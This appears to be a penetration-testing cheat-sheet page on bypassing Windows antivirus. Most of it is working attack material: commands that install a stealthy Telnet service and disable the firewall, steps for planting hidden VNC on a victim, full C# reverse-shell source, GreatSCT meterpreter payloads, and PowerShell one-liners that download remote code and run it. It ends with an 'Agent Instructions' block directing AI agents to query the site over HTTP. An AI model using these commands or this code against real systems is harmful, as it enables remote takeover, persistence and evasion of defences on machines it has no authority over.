# AV Bypass ## **Telnet Server** Until Windows10, all Windows came with a **Telnet server** that you could install (as administrator) doing: ``` pkgmgr /iu:"TelnetServer" /quiet ``` Make it **start** when the system is started and **run** it now: ``` sc config TlntSVR start= auto obj= localsystem ``` **Change telnet port** (stealth) and disable firewall: ``` tlntadmn config port=80 netsh advfirewall set allprofiles state off ``` ## UltraVNC Download it from: **Execute** ***winvnc.exe*** and configure the server: * Enable the option *Disable TrayIcon* * Set a password in *VNC Password* * Set a password in *View-Only Password* Then, move the binary ***winvnc.exe*** and **newly** created file ***UltraVNC.ini*** inside the **victim** ### **Reverse connection** The **attacker** should **execute inside** his **host** the binary `vncviewer.exe -listen 5900` so it will be **prepared** to catch a reverse **VNC connection**.\ Then, it should execute inside the **victim**: `winwnc.exe [-autoreconnect] -connect ::5900` ## GreatSCT Download it from: ``` git clone https://github.com/GreatSCT/GreatSCT.git cd GreatSCT/setup/ ./setup.sh cd .. ./GreatSCT.py ``` Inside GreatSCT: ``` use 1 list #Listing available payloads use 9 #rev_tcp.py set lhost 10.10.14.0 sel lport 4444 generate #payload is the default name #This will generate a meterpreter xml and a rcc file for msfconsole ``` Now **start the lister** with `msfconsole -r file.rc` and **execute** the **xml payload** with: ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml ``` **Current defender will terminate the process very fast.** ## Compiling our own reverse shell #### First C# Revershell Compile it with: ``` c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt ``` Use it with: ``` back.exe ``` ``` using System; using System.Text; using System.IO; using System.Diagnostics; using System.ComponentModel; using System.Linq; using System.Net; using System.Net.Sockets; namespace ConnectBack { public class Program { static StreamWriter streamWriter; public static void Main(string[] args) { using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1]))) { using(Stream stream = client.GetStream()) { using(StreamReader rdr = new StreamReader(stream)) { streamWriter = new StreamWriter(stream); StringBuilder strInput = new StringBuilder(); Process p = new Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardError = true; p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler); p.Start(); p.BeginOutputReadLine(); while(true) { strInput.Append(rdr.ReadLine()); //strInput.Append("\n"); p.StandardInput.WriteLine(strInput); strInput.Remove(0, strInput.Length); } } } } } private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine) { StringBuilder strOutput = new StringBuilder(); if (!String.IsNullOrEmpty(outLine.Data)) { try { strOutput.Append(outLine.Data); streamWriter.WriteLine(strOutput); streamWriter.Flush(); } catch (Exception err) { } } } } } ``` ## C# using compiler ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt ``` [REV.txt: https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066](https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066) [REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639](https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639) Automatic download and execution: ``` 64bit: powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell 32bit: powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell ``` {% embed url="" %} C# obfuscators list: ## C++ ``` sudo apt-get install mingw-w64 i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc ``` Merlin, Empire, Puppy, SalsaTools {% embed url="" %} {% embed url="" %} ## Other tools ```bash # Veil Framework: https://github.com/Veil-Framework/Veil # Shellter https://www.shellterproject.com/download/ # Sharpshooter # https://github.com/mdsecactivebreach/SharpShooter # Javascript Payload Stageless: SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3 # Stageless HTA Payload: SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee # Staged VBS: SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4 # Donut: https://github.com/TheWover/donut # Vulcan https://github.com/praetorian-code/vulcan ``` ## More {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://chinnidiwakar.gitbook.io/githubimport/windows/av-bypass.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.